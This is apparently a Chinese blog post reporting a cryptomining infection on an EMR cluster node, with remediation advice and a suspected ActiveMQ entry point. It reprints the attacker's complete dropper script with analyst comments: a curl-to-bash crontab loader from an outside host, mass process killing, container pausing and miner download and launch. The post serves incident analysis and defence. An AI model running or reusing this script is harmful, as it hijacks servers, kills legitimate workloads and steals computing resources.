supsplk 服务器被植入木马 挖矿 cpu使用 700%

最近 EMR 集群跑任务的时候总出现 task failed，优化 SQL、调整提交任务参数都没解决，最后在我排查的时候，发现一个从节点的 CPU 使用率达到了 800%。

经过一系列排查，发现是被植入木马了。

#被人种下的crontab
#* * * * * curl -s http://158.69.133.17:8220/logo3.jpg | bash -s

点击过去，伪装的是一张图片，其实 curl 过去拿到的是下面这个脚本。具体你们应该可以看出来了吧，最后居然发现他们是在挖矿。

#!/bin/sh
# --- Analyst annotation (incident write-up) ---
# This is the payload that the planted crontab fetches every minute
# (curl .../logo3.jpg | bash -s). Everything below is the attacker's code,
# kept verbatim as an indicator-of-compromise record; it is not meant to be
# run. Indicators that can be read directly from this script:
#   download / C2 host : 158.69.133.17:8220
#   dropped files      : /var/tmp/supsplk, /var/tmp/config.json,
#                        /var/tmp/ysjswirmrm.conf, /var/tmp/atd, /tmp/cron,
#                        /dev/shm/jboss
#   persistence        : the "* * * * *" crontab line re-installed below
#   mining pool        : monerohash.com:3333 (stratum URL with the wallet
#                        string, in the last download branch)
#
# Stage 1: kill processes by name / command line. Many names here are
# cryptomining related (minerd, minergate, minexmr, crypto-pool, stratum),
# others look like earlier variants of the same dropper (atd, /tmp/wa/httpd.conf,
# the geko*/irq* names). Presumably this removes competing miners so the CPU
# is free for this instance. The three passes are the same list with
# pkill -9 <name>, pkill -f <pattern> (full command line) and plain pkill.
# The list doubles as a hunting list when checking other hosts.
pkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 jva
pkill -f ./atd
pkill -f /tmp/wa/httpd.conf
pkill -f 108.61.186.224
pkill -f 128.199.86.57
pkill -f 67.231.243.10
pkill -f 142.4.124.164
pkill -f 192.99.56.117
pkill -f 45.76.102.45
pkill -f AnXqV.yam
pkill -f BI5zj
pkill -f Carbon
pkill -f Duck.sh
pkill -f Guard.sh
pkill -f JnKihGjn
pkill -f KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill -f NXLAi
pkill -f XJnRj
pkill -f accounts-daemon
pkill -f askdljlqw
pkill -f atd
pkill -f bonn.sh
pkill -f bonns
pkill -f carbon
pkill -f conn.sh
pkill -f conns
pkill -f crypto-pool
pkill -f ddg
pkill -f donns
pkill -f gekoCrw
pkill -f gekoCrw32
pkill -f gekoba2anc1
pkill -f gekoba5xnc1
pkill -f gekobalanc1
pkill -f gekobalance
pkill -f gekobalanq1
pkill -f gekobnc1
pkill -f ir29xc1
pkill -f irpbalanc1
pkill -f jIuc2ggfCAvYmluL2Jhc2gi
pkill -f jaav
pkill -f jva
pkill -f kw.sh
pkill -f kworker34
pkill -f kxjd
pkill -f lexarbalanc1
pkill -f lower.sh
pkill -f lowerv2.sh
pkill -f lowerv3.sh
pkill -f minerd
pkill -f minergate
pkill -f minergate-cli
pkill -f minexmr
pkill -f mixnerdx
pkill -f mule
pkill -f mutex
pkill -f myatd
pkill -f performedl
pkill -f polkitd
pkill -f pro.sh
pkill -f pubg
pkill -f pvv
pkill -f root.sh
pkill -f rootv2.sh
pkill -f rootv3.sh
pkill -f servcesa
# NOTE: "sleep", "wget", "polkitd", "acpid" and "accounts-daemon" are also
# legitimate process names — these pkill lines hit real system/user processes
# too, which is collateral damage worth knowing about when triaging the host.
pkill -f sleep
pkill -f sourplum
pkill -f stratum
pkill -f vsp
pkill -f watch-smart
pkill -f wget
pkill -f ysaydh
pkill -f acpid
# Second pass: same names, matched as ./<name> with SIGKILL.
pkill -9 ./atd
pkill -9 /tmp/wa/httpd.conf
pkill -9 108.61.186.224
pkill -9 128.199.86.57
pkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 45.76.102.45
pkill -9 ./AnXqV.yam
pkill -9 ./BI5zj
pkill -9 ./Carbon
pkill -9 ./Duck.sh
pkill -9 ./Guard.sh
pkill -9 ./JnKihGjn
pkill -9 ./KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill -9 ./NXLAi
pkill -9 ./XJnRj
pkill -9 ./accounts-daemon
pkill -9 ./askdljlqw
pkill -9 ./atd
pkill -9 ./bonn.sh
pkill -9 ./bonns
pkill -9 ./carbon
pkill -9 ./conn.sh
pkill -9 ./conns
pkill -9 ./crypto-pool
pkill -9 ./ddg
pkill -9 ./donns
pkill -9 ./gekoCrw
pkill -9 ./gekoCrw32
pkill -9 ./gekoba2anc1
pkill -9 ./gekoba5xnc1
pkill -9 ./gekobalanc1
pkill -9 ./gekobalance
pkill -9 ./gekobalanq1
pkill -9 ./gekobnc1
pkill -9 ./ir29xc1
pkill -9 ./irpbalanc1
pkill -9 ./jIuc2ggfCAvYmluL2Jhc2gi
pkill -9 ./jaav
pkill -9 ./jva
pkill -9 ./kw.sh
pkill -9 ./kworker34
pkill -9 ./kxjd
pkill -9 ./lexarbalanc1
pkill -9 ./lower.sh
pkill -9 ./lowerv2.sh
pkill -9 ./lowerv3.sh
pkill -9 ./minerd
pkill -9 ./minergate
pkill -9 ./minergate-cli
pkill -9 ./minexmr
pkill -9 ./mixnerdx
pkill -9 ./mule
pkill -9 ./mutex
pkill -9 ./myatd
pkill -9 ./performedl
pkill -9 ./polkitd
pkill -9 ./pro.sh
pkill -9 ./pubg
pkill -9 ./pvv
pkill -9 ./root.sh
pkill -9 ./rootv2.sh
pkill -9 ./rootv3.sh
pkill -9 ./servcesa
pkill -9 ./sleep
pkill -9 ./sourplum
pkill -9 ./stratum
pkill -9 ./vsp
pkill -9 ./watch-smart
pkill -9 ./wget
pkill -9 ./ysaydh
pkill -9 ./acpid
# Third pass: same names, default signal (SIGTERM).
pkill ./atd
pkill /tmp/wa/httpd.conf
pkill 108.61.186.224
pkill 128.199.86.57
pkill 142.4.124.164
pkill 192.99.56.117
pkill 45.76.102.45
pkill ./AnXqV.yam
pkill ./BI5zj
pkill ./Carbon
pkill ./Duck.sh
pkill ./Guard.sh
pkill ./JnKihGjn
pkill ./KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill ./NXLAi
pkill ./XJnRj
pkill ./accounts-daemon
pkill ./askdljlqw
pkill ./atd
pkill ./bonn.sh
pkill ./bonns
pkill ./carbon
pkill ./conn.sh
pkill ./conns
pkill ./crypto-pool
pkill ./ddg
pkill ./donns
pkill ./gekoCrw
pkill ./gekoCrw32
pkill ./gekoba2anc1
pkill ./gekoba5xnc1
pkill ./gekobalanc1
pkill ./gekobalance
pkill ./gekobalanq1
pkill ./gekobnc1
pkill ./ir29xc1
pkill ./irpbalanc1
pkill ./jIuc2ggfCAvYmluL2Jhc2gi
pkill ./jaav
pkill ./jva
pkill ./kw.sh
pkill ./kworker34
pkill ./kxjd
pkill ./lexarbalanc1
pkill ./lower.sh
pkill ./lowerv2.sh
pkill ./lowerv3.sh
pkill ./minerd
pkill ./minergate
pkill ./minergate-cli
pkill ./minexmr
pkill ./mixnerdx
pkill ./mule
pkill ./mutex
pkill ./myatd
pkill ./performedl
pkill ./polkitd
pkill ./pro.sh
pkill ./pubg
pkill ./pvv
pkill ./root.sh
pkill ./rootv2.sh
pkill ./rootv3.sh
pkill ./servcesa
pkill ./sleep
pkill ./sourplum
pkill ./stratum
pkill ./vsp
pkill ./watch-smart
pkill ./wget
pkill ./ysaydh
pkill ./acpid
# Stage 2: kill *any* process above 40% CPU (column $3 of `ps aux`) that is
# not the miner itself (grep -v supsplk). This is the line that most likely
# explains the "task failed" symptom in the write-up: every minute, busy
# legitimate workers (EMR tasks, JVMs, ...) are SIGKILLed.
ps aux | grep -v supsplk | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
# Removes an artefact under /dev/shm — presumably from an earlier variant; the
# path is an IoC to check on other hosts.
rm -rf /dev/shm/jboss
# Stage 3: install/start the miner if it is not already running.
# Branch 1: config_1.json + a binary served as "gcc", saved as /var/tmp/supsplk.
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
rm -rf /var/tmp/ysjswirmrm.conf
rm -rf /var/tmp/atd
mkdir /var/tmp
pkill -9 tratum
pkill -9 mixnerdx
pkill -9 performedl
pkill -9 sleep
pkill -9 /tmp/httpd.conf
pkill -9 JnKihGjn
pkill -9 irqba2anc1
pkill -9 irqba5xnc1
pkill -9 irqbnc1
pkill -9 ir29xc1
pkill -9 conns
# Kills the single top-CPU process if it is above 60% (generated "kill -9 PID"
# is piped to sh) — another source of collateral damage to real workloads.
ps auxw|head -1;ps auxw|sort -rn -k3|head -1|awk '{if($3>60.0) print "kill -9 " $2}'|sh
pkill -9 irqbalance
pkill -9 crypto-pool
pkill -9 XJnRj
pkill -9 NXLAi
pkill -9 BI5zj
pkill -9 askdljlqw
pkill -9 minerd
pkill -9 minergate
pkill -9 Guard.sh
pkill -9 ysaydh
pkill -9 bonns
pkill -9 donns
pkill -9 kxjd
pkill -f sleep
pkill -f /tmp/m
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f 108.61.186.224
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f bb
pkill -9 atd
pkill -9 accounts-daemon
pkill -f yam
# Kills by command-line substring: anything run from /tmp/ (except a process
# containing "ovpvwbvtat"), anything with "./" + httpd.conf, miner-style
# arguments ("-p x", stratum, cryptonight), and the names ysjswirmrm, snapd,
# mysql_dump. The snapd line again hits a legitimate system daemon.
ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "snapd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mysql_dump"|awk '{print $2}'|xargs kill -9
# Persistence: the victim's whole crontab is wiped (crontab -r) and replaced by
# the one-minute curl|bash loader — the exact line found in the write-up.
# Every `|| true &&` keeps the chain going even if a step fails. Simply
# killing the miner therefore does not help; the crontab entry must go first.
# The chain ends by pausing docker containers matching "kube-apis" and
# "nginx78" — presumably to free CPU; the effect on a cluster is visible as
# paused containers in `docker ps`.
crontab -r || true && \
echo "* * * * * curl -s http://158.69.133.17:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
docker pause `docker ps|grep kube-apis |awk '{print $1}'`
docker pause `docker ps|grep nginx78 |awk '{print $1}'`
# Download of miner config and binary over plain HTTP from the C2 host;
# outbound connections to 158.69.133.17:8220 are the network IoC to alert on.
curl -o /var/tmp/config.json http://158.69.133.17:8220/config_1.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/gcc
chmod 777 /var/tmp/supsplk
cd /var/tmp
# Thread count = CPU count + 1; hugepages = 3 * that. Note the backticks around
# $num: the shell tries to *execute* the number as a command, so the sysctl
# argument is the (empty) output of a failing command — an attacker bug, left
# as found. Unexpected changes to vm.nr_hugepages are still worth alerting on.
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
# Miner start: /var/tmp/supsplk with config.json, detached via nohup.
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
# Branch 2: same install sequence, different config (c1.json) and a binary
# served as "minerd".
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/c1.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/minerd
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
# Branches 3 and 4 have no `ps` check in front of them: `$?` here is the
# status of whatever ran last in the previous block (`pwd` or the backgrounded
# nohup), which is almost always 0, so these else-branches rarely execute.
# They would fetch kworker.json with binaries served as "atd2" / "atd3".
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/kworker.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/atd2
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/kworker.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/atd3
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
# Branch 5 (last resort): a binary served as "yam", started with the pool and
# wallet on the command line instead of a config file. The stratum URL and
# monerohash.com:3333 are useful for egress filtering / detection; the wallet
# string identifies this campaign across hosts.
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/supsplk http://158.69.133.17:8220/yam
chmod 777 /var/tmp/supsplk
cd /var/tmp
nohup ./supsplk -c x -M stratum+tcp://41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo:x@monerohash.com:3333/xmr >/dev/null &
fi
echo "runing....."
# Remediation order implied by the above: remove the crontab entry first (it
# re-downloads this script every minute), then kill supsplk and anything under
# /var/tmp started from it, then delete the dropped files, and finally close
# the initial entry point (the write-up suspects ActiveMQ on port 61616).

解决办法

找到寄生的目录，一般它都会在 tmp 里，我这个是在 "/var/tmp/"。首先你要先把它的 crontab 干掉（否则每分钟都会被重新拉起），然后把这个目录下它的脚本产生的文件干掉，然后再把对应的进程杀掉。

上面说的治标不治本，你的服务器被攻击了，这是安全问题。对了，ActiveMQ 开放的端口 61616 有漏洞，把这个限制了吧。
